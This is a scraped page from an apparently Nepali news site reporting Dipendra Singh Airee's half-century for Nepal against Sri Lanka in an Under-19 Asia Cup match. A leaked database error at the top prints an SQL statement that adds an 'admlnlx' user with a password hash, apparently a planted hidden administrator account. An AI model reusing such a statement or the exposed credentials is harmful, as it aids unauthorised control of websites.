WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BU9S2uBvqGior27oF5jlhUwYx/oeUh.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:27:26', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर ३०–
यु १९ एशिया कपको पहिलो खेलमा नेपालका दीपेन्द्र सिंह ऐरीले अर्धशतक प्रहार गरेका छन् । अहिले भईरहेको प्रतियोगिताको पहिलो खेलमा टेष्ट राष्ट्र श्रीलंकाविरुद्ध दीपेन्द्रले अर्धशतक प्रहार गरेका हुन् ।
दीपेन्द्रले ६९ बलमा अर्धशतक बनाएका हुन् । उनले ५ चौका प्रहार गरे । जारी खेलमा नेपालले शानदार प्रर्दशन गरिरहेको छ । श्रीलंकले दिएको २२८ रनको चुनौती पछ्याउने क्रममा नेपालले ५ विकेटको क्षतिमा ३९ ओभरमा १६२ रन बनाएको छ ।